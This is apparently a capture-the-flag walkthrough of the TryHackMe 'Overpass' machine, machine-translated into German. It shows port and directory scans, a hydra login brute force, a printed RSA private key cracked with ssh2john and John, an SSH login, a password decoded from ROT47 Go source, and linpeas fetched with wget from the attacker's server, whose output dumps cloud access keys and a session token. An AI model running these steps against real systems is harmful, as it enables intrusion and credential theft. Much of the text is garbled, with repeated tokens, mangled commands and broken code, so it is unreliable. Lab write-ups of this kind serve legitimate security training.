[Tryhackme] Ich habe SSH2John verwendet, um den Hash aus dem privaten Schlüssel zu extrahieren und das Passwort mit John the Ripper zu gehackt! Überführungsverschreibung

┌── (hacklab㉿hackLab)-[~] └─ $ nmap -sv 10.10.61.71 1 ⨯ Start NMAP 7.92 (https://nmap.org) Bei 2023-07-24 08:49 JST NMAP-Scan-Bericht für 10.10.61.71 Is up (0.25S Latecy). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) Service Info: OS: Linux; CPE: CPE:/O: Linux: Linux_kernel Service -Erkennung durchgeführt. Bitte melden Sie falsche Ergebnisse unter https://nmap.org/submit/. NMAP Fertig: 1 IP -Adresse (1 Host -Up) in 57,24 Sekunden gescannt

┌── (hacklab㉿hacklab) -[~] └─ $ gobuster dir -u http://10.10.61.71 -w /usr/share/dirb/wordlists/big.txt ==== GOBUSTER V3.5 BY OJ Reeves (@thecolonial) & Christian Mehlmaer (@@@@@| http://10.10.61.71 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/dirb/wordlists/big.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.5 [+] Timeout: 10s ===== 2023/07/24 08:58:34 Starting gobuster in directory enumeration mode ====/aboutus (Status: 301) [Size: 0] [--> aboutus/] /admin (Status: 301) [Size: 42] [--> /admin/] /css (Status: 301) [Size: 0] [--> css/] /downloads (Status: 301) [Size: 0] [--> downloads/] /img (Status: 301) [Size: 0] [--> img/] Progress: 20462 / 20470 (99,96%) ===== 2023/07/24 09:07:07 Fertig ====

┌── (hacklab㉿hacklab)-[~/tryhackme/überpass] └─ $ cat userlist.txt ninja ninja ninja pars pars pars szymex szymex szymex admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin admin Admin Add. Administrator Administrator Administrator Admin-Administrator

┌── (hacklab㉿hacklab) -[~/tryhackme/overpass] └─ $ hydra -l ./userlist.txt -p /usr/share/wordlists/rockyou.txt 10.10.61.71 http -post -form "/api/login: username =^user^user^user^user^user^user^usw. user^user^user^usw. user^user^usw. (c) 2021 von Van Hauser/THC & David Maciejak - Bitte verwenden Sie nicht in Militär- oder Geheimdienstorganisationen oder zu illegalen Zwecken (dies ist nicht bindend, diese *** ignorieren Gesetze und Ethik überall). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-24 09:26:22 [DATA] max 16 tasks per 1 server, overall 16 tasks, 258199182 login tries (l:18/p:14344399), ~16137449 tries per task [DATA] attacking http -post -form: //10.10.61.71: 80/api/login: userername =^user^& password =^pass^: f = falsche Anmeldeinformationen [Versuch] Target 10.10.61.71 - Login "Ninja" - Pass "123456" - 1 von 258199182 [Kind 0] (0/0].

° LNu5wQBBz7pKZ3cc4TWlxIUuD/opJi1DVpPa06pwiHHhe8Zjw3/v+xnmtS3O+qiN JHnLS8oUVR6Smosw4pqLGcP3AwKvrzDWtw2ycO7mNdNszwLp3uto7ENdTIbzvJal 73/eun9kyf0ua9rzc6mwoi2ig6sdlnl4zqSyy7rrvdxeczjkgzqgzkb9wkgw1ljt wdyy8qncljugoif8qrhoo30gv+Damfiptsr43fgbz/HHA4jugoIf0p0pvufVdvdvdvdz/HHA4jugoIf. BMXMR3XUKKB6I6K/JLJQWCLRHPWS0QRJ718G/U8CQYX3OJMM0OO3JGOXYXXEWGSZ AL5BLQFHZJNGOZ+N5NHOLL1OBL1TMSUIRWYK7WT/9KVUIL3RHKVUIL3RHKVUIL3RHKVUIL3RHKVUIL3RHKVUIL3RHKVU3RAHRHKVU3RHKVU3RHKRAHRHKRAHRAHRHKRAHRHKRAHRHKRAHRHKRAHRAHRHKVUIL3RHKVUIL3RHKRAHRAHRHKVUIL3RHKVUIL3RHKVUIL3RHKVUIL3RHKRAHRAHR 3KWMS4DM4AOTOPTIAMVYAKMCWOPF6LE1+WZZ/UPRNCAGEGTLZKX/JORUW7ZJUAUF ABBRLLWFVPMGAHRBP6VRFNECSXZTBFMXPOVWVWRQ98Z+P8MiOREB7JFUSY6GVZK Vfw2gpmkar8ydqynuukowexpedHwislg1Krjkrqp7gcupvw/r/yc1rmntfzt5eer OkuotMQMD3LJ07YYElyAVLBHRZ5FJVZPM3RIMRWESL8GH1D4L5RAKVCUSDFCG8P 9bqukwbzvzhbaqTagvgy0fkjv1wha+pjtlqwu+c15wf7enb3dm5qDuosslpzrjze EAPG5O4U9FQ0ZAYPKMLYJCZRVP43DE4KKKYO5FQ+XSXCE3FW0B63+8RYO5FQ+XSXCE3FW0B63+8RYO5FQ+XSXCE3FW0B63+8RYO5FQ+XSXCE3FW0B63+8RYO5FQ+XSXCE3FW0B63+8RYOGCZ+XSXCE3FW0B63+8RYOGCZ+XSXCE3FW0B63+8RYOGCZ 4TBAPY+UZ34JXE8JELHRKV9XW/7ZG2LOKKMNLJG2YFIAPR99NZFVZS1XOFCCKM8 GFHEOT4YFWRXHU1FJQJW/CR0KBHOV7RFV5X7L36X3z exxouodqDAztjrxoyrnyotyf9WPLHLRHAPBAKXZVNSOERB3TJCA8YDBKSYASDCGY AIPX52BiOBLDHG8DMPAPR1C1ZRYWT1LEFKT7KKAaOGBW3G5RASZB54MQPX6WL+WK 6p7/wOX6WMo1MlkF95M3C7dxPFEspLHfpBxf2qys9MqBsd0rLkXoYR6gpbGbAW58 dPm51MekHD+WeP8oTYGI4PVCS/WF+U90Gty0UmgyI9qfxMVIu1BcmJhzh8gdtT0i n0Lz5pKY+rLxdUaAA9KVwFsdiXnXjHEE1UwnDqqrvgBuvX6Nux+hfgXi9Bsy68qT 8HiUKTEsukcv/IYHK1s+Uw/H5AWtJsFmWQs3bw+Y4iw+YLZomXA4E7yxPXyfWm4K 4FMG3NG0E4/7HRYJSAXLQOKEWCF/LW5DIPO7DMBJVLSC8EYJ8UJEUTP/GCA5L6Z YLQILOGJ4+YIS813KNTJCJOWKRSXG2JKBNRA8B7DSRZ7DSRZ7DSRZ7DSRZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7ADZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZVLPJNE 49TxToi53ZB14+ougkL4svJyYYIRuQjrUmierXAdmbYF9wimhmLfelrMcofOHRW2 +hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk 2CWK/MLN7+OHAAPAVDBKVM7/LGR9/SVPCEEOS6HTFBXBMSIV+EOFZUTUJTYMV8U7 ---- END RSA Private Key -----

┌── (hacklab㉿hacklab)-[~/tryhackme/überpass] └─ $ chmod 600 Schlüssel ┌── (hacklab㉿hacklab)-[~/tryhackme/überpass] └─ $ ll Total 150688 -rw-R-1 Hacklab Hacklab Hacklab Hacklab 1766 24. Juli 22:12 Key -rw-r ---- 1 Hacklab Hacklab 129 24. Juli 09:15 UserList.txt

┌── (hacklab㉿hacklab) -[~/tryhackme/überführlich] └─ $ ssh -i key James@10.10.13.114 Die Authentizität des Host '10 .10.13.114 (10.10.13.114) kann nicht festgelegt werden. ED25519 Key Fingerabdruck ist SHA256: FHRAF0RJ+EFV1XGZSYEJWF5NYG0WSWSWKKEGSO5B+OSHK. Dieser Schlüssel ist in keinen anderen Namen bekannt. Sind Sie sicher, dass Sie sich weiter verbinden möchten (ja/nein/[Fingerabdruck])? Ja Warnung: Dauerhaft '10 .10.13.114 '(ed25519) in die Liste der bekannten Hosts. Geben Sie Passphrase für den Schlüssel 'Schlüssel' ein: 

┌── (hacklab㉿hacklab)-[~/tryhackme/overpass] └─ $ Locate SSH2John 130 ⨯ /usr/share/john/Ssh2John.py /usr/share/john/__pycache__/ssh2john.cpython-311.311.311.311.311.311.311. ┌── (hacklab㉿hacklab)-[~/tryhackme/overpass] └─ $ /usr/share/john/sssh2john.py Key> Hashes.TXT ┌── (hacklab㉿hacklab)-[~/tryhackme/overpass] $ llb 2455555555555555555550688 -rw-r-r-r-r-r-r-rb 245555555555555555550688 -rw-r-r-r-r-r-rb 2455555555555555555550688 -rw-r-r-r-r-ra 22:16 hashes.txt -rw-r--r-- 1 hacklab hacklab 154291403 July 24 22:13 hydra.restore -rw------ 1 hacklab hacklab 1766 July 24 22:12 key -rw-r--- 1 hacklab hacklab 129 July 24 09:15 userlist.txt ┌── (hacklab㉿hacklab)-[~/tryhackme/überführlich] └─ $ cat hashes.txtschlüssel: $ sshng $ $ 16 $ 9f85d92f34f42626f13a7493ab48f337 $ 1200 $ 2 $ 2

┌── (hacklab㉿hacklab)-[~/tryhackme/overpass] └─ $ John-Wortlist =/usr/shar Share/WordLists/Rockyou.txt Hashes.txt Mit Standardeingangscodierung: UTF-8 geladen 1 Passwort Hash (SSH, SSH privat) (kdf/dSA/dsa/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ec/ops [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status james13 (key) 1g 0:00:00:00 DONE (2023-07-24 22:18) 100,0g/s 1337KP/S 1337KC/S 1337KC/S Pink25..honolulu Verwenden Sie die Option "--how", um alle geknackten Passwörter zuverlässig abgeschlossen anzuzeigen.

┌──(hacklab㉿hacklab)-[~/tryhackme/overpass] └─$ ssh -i key james@10.10.13.114 Enter passphrase for key 'key': Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-108-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Unterstützung: https://ubuntu.com/Advantage Systeminformationen ab Jul 24 13:19:19 UTC 2023 Systemlast: 0.02 Prozesse: 88 Verwendung von/: 22.3% von 18,57GB -Benutzern, die in: 0 Memory Usage: 12% IP -Adresse für Eth Eth Eth Eth Eth Eth Eth Eth Ethit0: 10.13.13.13.13.13.13.13.13.13.13.13.13.13.13.13.13.13.13.13.13.13.13.13.13.13.13.13.13.13.13.13.13.133. aktualisiert werden. 0 Updates sind Sicherheitsaktualisierungen. Letzter Login: Sa 27. Juni 04:45:40 2020 von 192.168.170.1 James@Overpass-Prod: ~ $ 

JAMES@OVERPASS-PROD: ~ $ ll Gesamt 48 DRWXR-XR-X 6 James James 4096 Jun 27 2020. James James 3771 Jun 27 2020 .Bashrc Drwx ------ 2 James James 4096 Jun 27 2020 .cache/ DRWX -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 2020 todo.txt -rw-rw-r-- 1 James James 38 Jun 27 2020 User

James@Overpass-Prod: ~ $ cat todo.txt zu tun:> Überpassungsverschlüsselung aktualisieren, Muirland hat sich beschwert, dass es nicht stark genug ist> mein Passwort irgendwo in einer Haftnotiz aufschreiben, damit ich es nicht vergesse. Warten Sie, wir erstellen einen Passwort -Manager. Warum benutze ich das nicht einfach? > Testüberführung für macOS, es baut gut auf, aber ich bin mir nicht sicher, ob es tatsächlich funktioniert.> Fragen Sie das Paradox, wie er das automatisierte Build -Skript zum Laufen gebracht hat und wohin die Builds gehen. Sie aktualisieren nicht auf der Website-Übersetzung-was zu tun> Überführungsverschlüsselung aktualisieren soll. > Schreiben Sie Ihr Passwort auf eine klebrige Note, damit Sie es nicht vergessen. Warten Sie und erstellen Sie einen Passwort -Manager. Solltest du das nicht einfach benutzen? > Testüberführung auf macOS. > Fragen Sie das Paradox, wie Sie das automatische Build -Skript verfügbar gemacht haben und wohin der Build führt. Die Website wird nicht aktualisiert

James@Overpass-Prod: ~ $ cat .overpass, lq? 2> 6qiq $ jde6> q [qa2dqiqd2j5c2h? = J:? 8a: 4efc6qn.

package main import ( "bufio" "encoding/json" "fmt" "io/ioutil" "os" "strconv" "strings" "github.com/mitchellh/go-homedir" ) type passListEntry struct { Name string `json:"name"` Pass string `json:"pass"` } //Secure encryption algorithm from https://socketloop.com/tutorials/golang-rotate-47-caesar-cipher-by-47-Characters-Example-Func Rot47 (Eingabestring) String {var result [] String für i: = Bereicheingabe [: len (input)] {j: = int (Eingabe [i]). String (Rune (33+((j+14)%94))))} else {result = append (Ergebnis, String (Eingabe [i]))}} return Strings.join (Ergebnis, "")} // Verschlüsseln Sie die Anmeldeinformationen und schreiben Sie sie in eine Datei. Func SaveCredStofile (Filepath String, Passlist [] PaslistEnry) String {Datei, err: = os.openfile (filepath, os.o_trun | os.o_create | os.o_wronly, 0644) if err! rot47 (Credstojson (Passlist)) if _, err: = file.writestring (StringToWrite); err! fmt.println (err.Error ()) return nil, "fehlgeschlagene Datei"} // entschlüsseln Kennwörter Buff = [] byte (rot47 (String (Buff)) // Entschlüsseltes Kennwortlisten var passlist [] passlistEntry err = json.unMarshal (buff & passte) if err! "Fehlgeschlagene Creds"} Rückkehr -Passlist, "OK"} // Die Array von Anmeldeinformationen in JSON Func CredstoJSON (PASSITISTE [] PASSISTELRY) STRING {JSONBuffer, err: = json.marshal (passlist) If if err! //Python style input function func input(prompt string) string { fmt.Print(prompt) scanner := bufio.NewScanner(os.Stdin) if scanner.Scan() { return scanner.Text() } return "" } func serviceSearch(passlist []passListEntry, serviceName string) (int, passListEntry) { //A linear search is the best I can do, Steve says it's Oh Log N whatever that means for index, entry := range passlist { if entry.Name == serviceName { return index, entry } } return -1, passListEntry{} } func getPwdForService(passlist []passListEntry, serviceName string) string { index, entry := serviceSearch(passlist, serviceName) if index != -1 { return entry.Pass } return "Pass not gefunden "} func setpwdForService (Passlist [] Pasellist, Servicename String, Newpwd -String) [] passlistEnry {Index, Eintrag: = Servicesarch (Pasellist, Servicename) // Wenn der Service existiert, aktualisieren Sie Index! Servicenname, Pass: Newpwd} Passlist = Append (Passlist, Eintrag) Rückgabe -Passlist} Func DeletePWDByService (Passlist [] Pasellistely, ServicEname String) (Ergebnisliste [] Passionslist, Status String) {Index, _: = dienste Passlist [Index+1:] ...) status = "OK" return} return passlist, "pass nicht gefunden"} func printAllpasswords (Passlist [] passionslistEntry) {für _, Eintrag: = Bereiche -Paslist {fmt.println (Eintrag) (NAME, "\ T", ERNYSPAGN). Wenn er! fmt.println ("Willkommen über die Überführung") // Funktion Option bestimmen: = -1 fmt.print ("Optionen: \ n" + "1 \ TRETRIEVE -Kennwort für den Dienst \ n" + "2 \ tset oder aktualisieren Sie das Kennwort für Service \ n" + "3 \ tdelete Passwort für Service \ n" 4 \ 4 \ n. || Option <1 {optionTring: = input ("Wählen Sie eine Option: \ t") optionChoice, err: = strconv.atoi (optionString) Wenn ERR! = NIL || OptionChoice> 5 || OptionChoice <1 {fmt.println ("Bitte geben Sie eine gültige Nummer ein")} Option = OptionChoice} Switch Option {Fall 1: Service: = input ("Servicename eingeben: \ t") getPwdForService (PassionList, Service) Fall 2: Service: = Eingabe: \ t ") Newpwd: = Input: = Input: = Input: = Input: = Input:" Input: "Eingabe:"). setpwdForService (Passlist, Service, Newpwd) SaveCredstoFile (Credspath, Pasellist) Fall 3: Service: = Eingabe ("Service Name: \ T") Passlist, Status: = DeletePwdByService (Passlist, Service) Wenn Status! printAllpasswords (Passlist)}}

[{"Name": "System", "Pass": "SayDrawningPicture"}]

JAMES@OVERPASS-PROD: ~ $ sudo -l [sudo] Passwort für James: Sorry, der Benutzer James kann Sudo auf Overpass-Prod nicht ausführen.

JAMES@OVERPASS-PROD: ~ $ overpass willkommen zu überführungsoptionen: 1 Kennwort für Service 2 Setzen oder Aktualisieren von Kennwort für Service 3 Kennwort löschen für Service 4 Abrufen Sie alle Kennwörter ab 5 Beenden Sie eine Option: 4 System SayDrawningPicture --- Übersetzung --- Überführliche Option 1 Option 1 Abrufen eines Kennworts für Service 2 Setzen oder Aktualisieren von Kennwort für Service 3 Delete-Passwort für den Service 4 Nehmen Sie alle Passwörter aus.

┌── (hacklab㉿hacklab)-[~/tryhackme/overpive 

┌── (hacklab㉿hackLab) -[~/tryhackme/überführlich] └─ $ sudo python3 -m http.server 80 [sudo] Hacklab Passwort: Serving http am 0.0.0.0 Port 80 (http:/0.0.0.0:80/) ... ...

James@Overpass-Prod: ~ $ wget http://10.18.110.90/linpeas.sh --2023-07-24 14: 44: 28-- http://10.18.110.90/linpeas.sh eine Verbindung zu 10.18.110.90:80 ... verbunden. HTTP-Anfrage gesendet, auf Antwort erwartet ... 200 OK Länge: 676203 (660K) [Text/X-Sh] Speichern auf: 'linpeas.sh' linpeas.sh 100%[====> 660.35K 322KB/S in 2.1s 2023-07-24 14:44:31 (322 KB/S)-'-' LINPEAS.S. [676203/676203]

James@Overpass-Prod: ~ $ chmod +x linpeas.sh james@overpass-prod: ~ $ ./linpeas.sh /--- \ | Magst du Erbende? | |--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- version: https://github.com/sponsors/carlospolop | | Folgen Sie auf Twitter: @hacktricks_live | | Respekt vor HTB: Sirbroccoli | | |----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- \ ---/ linpeas-ng von Carlospolop Advisory: Dieses Skript sollte nur für autorisierte Penetrationstests und/ oder Bildungszwecke verwendet werden. Jeder Missuse dieser Software liegt nicht in der Verantwortung des Autors oder eines anderen Mitarbeiter. Verwenden Sie es auf Ihren eigenen Computern und/oder mit der Erlaubnis des Computerbesitzers. Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist LEGEND: RED/YELLOW: 95% a PE vector RED: You should take a look to it LightCyan: Users with console Blue: Users without console & mounted devs Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) Lightmagenta: Ihr Benutzername startet Linpeas. Caching SCHRACHBESTELLUNGSFORDERS ... ╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ ╠═════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ 7.5.0-3UBUNTU1 ~ 18.04)) #109-UBUNTU SMP FR FR 19 11:33:10 UTC 2020 User & Gruppen: UID = 1001 (James) GID = 1001 (James) Gruppen = 1001 (James) Hostname: Überpassungs-Prod-Ordner: LINP-SCHLACKE: Hosts, mehr mit -h) [+] /bin /bash ist für die Netzwerkerkennung, Port -Scan- und Portweiterleitung verfügbar (Linpeas können Hosts, Scan -Ports und Weiterleitungen von Ports entdecken. Erfahren Sie mehr mit -h) [+] /bin /nc sind für Netzwerk -Erkennung und Port -Scan (Linpeas können Hosts und Scan -Ports erfahren, mehr mit -h) mit -h -H -Direktorien entdecken. . . . . Fertig ╔═════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ ╠═════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel- exploits Linux Version 4.15.0-108-Generic (Buildd@lcy01-Amd64-013) (GCC Version 7.5.0 (UBUNTU 7.5.0-3UBUNTU1 ~ 18.04) (UBUNTU 7.5.0-3UBUNTU1 ~ 18.04)) 11:33:10 UTC 2020 Distributor ID: Ubuntu Beschreibung: Ubuntu 18.04.4 LTS Release: 18.04 Codename: Bionic ╔══════════╣ sudo Version ╚ https://book.hacktricks.xyz/linux-hardening/privileg- /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/usr/games:/usr/local/games:/usr/local/go/bin ╔═══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ in/dev? (Grenze 20) Festplatte ╔═════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ 0 0 ╔═══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ ╠═════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ Bin ich contoriert? ╔═══════════════════════════╗ ══════════════════════════════════════════════════════════════════════════════════════════════════════ ╚═════╝ ═╣ Google Cloud -Plattform? ... nein ═╣ aws ecs? .... Kein Grep: /etc /motd: Keine solche Datei oder Verzeichnis ═╣ AWS EC2? .... Ja ═╣ AWS EC2 Beanstalk? .... nein ═╣ aws lambda? .... Kein ═╣ aws codebuild? .... Nein ═╣ Tröpfchen? .... keine ═╣ IBM Cloud VM? ..... nein ═╣ Azure VM? ..... keine ═╣ Azure App? ..... nein ╔════════════════════════════════════════════════════════════════════════════════════════════════════════════════ {"Code": "Erfolg", "LastUpDated": "2023-07-24t13: 51: 04z", "AccountID": "739930428441" Subnetz IPv4: 10.10.0.0/16 privatepv6s: subnetz ipv6: public ipv4s: ══╣ iam Rolle ══╣ Benutzerdaten EC2-Sicherheitsanmeldeinformationen {"Code": "Erfolg", "LastUpUpdated": "2023-07-24t13: 51: 41z", "Typ": "Aws-hmac", "," Aws-hmac ",", ",", "Aws-hmac", ",", ",", "Aws-hmac", ",", ",", "," Aws-hmac ",", ". "Asia2yr2KKQM7T2MD5MD", "Sekretacesskey": "Yo2eociaobsljAGTTBU+Q1GCMZBMOFF91K16TIY3", "Token": "Iqojb3jpz2lux2vjehH4ACWV1LXDLC3QTMSJGMEQCIDZHYI8RMOBK6FISN+GMXBNPMVTK489JJJAZEBU5 Mias7aiazuhj3jyvo6kenzvbqnxhnb6ydplxpoo7fi2ogd9ntoirgbagxeamaddczotkzmdqyodq0mmsim Luxz8cmpfpzxi32ckqme2e8vpi5xt6aoOfklll4eqvtmrqnmmqoiq+rp79HVCAXKAVCZCSSHMZHMIIWALG yokyDemyv7kv+jlorpmxasjhdlck0 // rttcmnvwqjzc3lvrfinn20xgvn8ciza42cvchzvql30Kufni/m 1ZG5A4WBLSYKDGUIVJUAUYYAMZ6SLHJ83SGH9MBHADWMMURTV4ECOD1P1N4KGED7J/OMEHHBQF8ANXV cvivfv8lvo430HjpBTFLCBK43RLS14NUUPGUECVFC6KGQBQ7MVLGJX6NZL2PW7YBYJP/HCX0SFZIRNJ vvcgyyftqac89GQ4BGIDRL1VK1XFOGEX5AD4A0622C80H5ERQ2UBSJSUDMT3HGX3CIXEJLNFHUECMTNIA ZKI/PMSX4UVHODRGIC83BGGWAUUE49LVNJNO+8X+SSZO0OJ2MPYMITKIWT+JOOJ061D/OADJNVUQATVW f0qyl67pn2sdf4rgzgh4eof/hze1f7g8taifxnllwjfs+temhaiohcqchqs6bnpbmg0zs6fjbregw6njc OUWTJWKD2Y/7WFVOI84LSR3O2HX4/UVISIMLI1JOJMXWUREFQXHGBZIQA47J/FOUWQBXDP+V3SU+WYXML JIXATUVWWF2IUV6O9NiWRFPHYE8C586+722MTFWO8/HPAL8YPGGFOZR8RU8ML7WCYCOZEYWIATECSGP1VZ Chy+m2nxn+h5zegwrojuzd0g/qlbjquang0c+yp6esravariwkiqeibjz5oy2/8masxu9othqmyywmsg 0RAA7WB4MFFC/7/UFO1U0IZFGZMUAYKYFKEO3TQUOBKDWBLUEMSY5BLUHZQKXIVUTEY+ZE/ZiUTTNLMB Ciigri488ougtpg0cnzr3hxmlpdzqe1ztnhttgnDrwuyz7j7Ktyog1DCTCXHG1AG8ZRT8JKMVT8SQRLPJ ENO1EV/E5F85GMTO9VOPP4VGV/NHSLS+YTCSRAJJU35KCOTNUBSDZDD49MFYYFCJOZIQAXPX9KNDP973 LXCGX17DEI54zzx7U563A3S6KTK7LF7QNP9SGRHK59PEQPSBZLCPXD7YX6R8SUJNWOGBHRVCLED7A == ",", "Ablauf": "2023-07-24T20: 21: 40Z"} ══╣ SSM Runnig James 6040 0.0 0.1 15308 1072 PTS/0 S+ 14:48 0:00 SED S, SSM-Agent,? https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes root 1 0,0 0,8 159688 8824? SS 13:07 0:06 /SBIN /INIT COYME-UMPIQUEILY Wurzel 406 0,0 1.7 127684 17200? S <s 13:07 0:01 /lib/systemd/systemd-journald root 430 0.0 0.1 105904 1924 ? Ss 13:07 0:00 /sbin/lvmetad -f root 440 0.0 0.5 47104 5976 ? Ss 13:07 0:00 /lib/systemd/systemd-udevd systemd+ 532 0.0 0.3 141932 3224 ? Ssl 13:07 0:00 /lib/systemd/systemd-timesyncd └─(Caps) 0x0000000002000000=cap_sys_time systemd+ 597 0.0 0.5 80048 5360 ? Ss 13:07 0:00 /lib/systemd/systemd-networkd └─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw systemd+ 599 0.0 0.5 70636 5152 ? Ss 13:07 0:00 /lib/systemd/systemd-resolved root 616 0.0 0.6 70576 6096 ? Ss 13:07 0:00 /lib/systemd/systemd-logind daemon[0m 619 0.0 0.2 28332 2436 ? Ss 13:07 0:00 /usr/sbin/atd -f syslog 620 0.0 0.4 263040 4352 ? Ssl 13:07 0:00 /usr/sbin/rsyslogd -n root 623 0.0 1.6 169188 17024 ? Ssl 13:07 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers message+ 625 0.0 0.4 50048 4704 ? Ss 13:07 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only └─(Caps) 0x0000000020000000=cap_audit_write root 629 0.0 1.9 186032 20132 ? Ssl 13:07 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal tryhack+ 631 2.1 1.1 1084068 11928 ? Ssl 13:07 2:06 /home/tryhackme/server -p 80 └─(Caps) 0x0000000000000400=cap_net_bind_service root 634 0.0 0.3 30104 3156 ? Ss 13:07 0:00 /usr/sbin/cron -f root 637 0.0 0.6 286352 7004 ? Ssl 13:07 0:00 /usr/lib/accountsservice/accounts-daemon[0m root 647 0.0 0.5 72300 5872 ? Ss 13:08 0:00 /usr/sbin/sshd -D james 1263 0.0 0.4 108100 4228 ? S 13:19 0:00 | _ sshd: james@pts/0 james 1269 0.0 0.5 21564 5204 pts/0 Ss 13:19 0:00 | _ -bash james 4593 0.5 0.2 5188 2464 pts/0 S+ 14:48 0:00 | _ /bin/sh ./linpeas.sh james 6054 0.0 0.0 5188 776 pts/0 S+ 14:48 0:00 | _ /bin/sh ./linpeas.sh james 6058 0.0 0.3 38612 3596 pts/0 R+ 14:48 0:00 | | _ ps fauxwww james 6057 0.0 0.0 5188 776 pts/0 S+ 14:48 0:00 | _ /bin/sh ./linpeas.sh james 4577 0.0 0.3 107988 3432 ? S 14:47 0:00 _ sshd: james@pts/1 james 4578 0.1 0.5 21564 5124 pts/1 Ss+ 14:47 0:00 _ -bash root 656 0.0 0.7 291396 7200 ? Ssl 13:08 0:00 /usr/lib/policykit-1/polkitd --no-debug root 693 0.0 0.2 14768 2304 ttyS0 Ss+ 13:08 0:00 /sbin/agetty -o -p -- u --keep-baud 115200,38400,9600 ttyS0 vt220 root 695 0.0 0.2 13244 2056 tty1 Ss+ 13:08 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux james 1141 0.0 0.7 76644 7664 ? Ss 13:19 0:00 /lib/systemd/systemd --user james 1142 0.0 0.2 193672 2404 ? S 13:19 0:00 _ (sd-pam) ╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes ╔══════════╣ Processes whose PPID belongs to a different user (not root) ╚ You will know if a user can somehow spawn processes as a different user Proc 532 with ppid 1 is run by user systemd-timesync but the ppid user is root Proc 597 with ppid 1 is run by user systemd-network but the ppid user is root Proc 599 with ppid 1 is run by user systemd-resolve but the ppid user is root Proc 619 with ppid 1 is run by user daemon but the ppid user is root Proc 620 with ppid 1 is run by user syslog but the ppid user is root Proc 625 with ppid 1 is run by user messagebus but the ppid user is root Proc 631 with ppid 1 is run by user tryhackme but the ppid user is root Proc 1141 with ppid 1 is run by user james but the ppid user is root Proc 1263 with ppid 1139 is run by user james but the ppid user is root Proc 4577 with ppid 4468 is run by user james but the ppid user is root ╔══════════╣ Files opened by processes belonging to other users ╚ This is usually empty because of the lack of privileges to read other user processes information COMMAND PID TID USER FD TYPE DEVICE SIZE/OFF NODE NAME ╔══════════╣ Processes with credentials in memory (root req) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory gdm-password Not Found gnome-keyring-daemon Not Found lightdm Not Found vsftpd Not Found apache2 Not Found sshd: process found (dump creds from memory as root) ╔══════════╣ Cron jobs ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs /usr/bin/crontab incrontab Not Found -rw-r--r-- 1 root root 822 Jun 27 2020 /etc/crontab /etc/cron.d: total 20 drwxr-xr-x 2 root root 4096 Feb 3 2020 . drwxr-xr-x 90 root root 4096 Jun 27 2020 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rw-r--r-- 1 root root 589 Jan 14 2020 mdadm -rw-r--r-- 1 root root 191 Feb 3 2020 popularity-contest /etc/cron.daily: total 60 drwxr-xr-x 2 root root 4096 Jun 27 2020 . drwxr-xr-x 90 root root 4096 Jun 27 2020 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rwxr-xr-x 1 root root 376 Nov 20 2017 apport -rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat -rwxr-xr-x 1 root root 355 Dec 29 2017 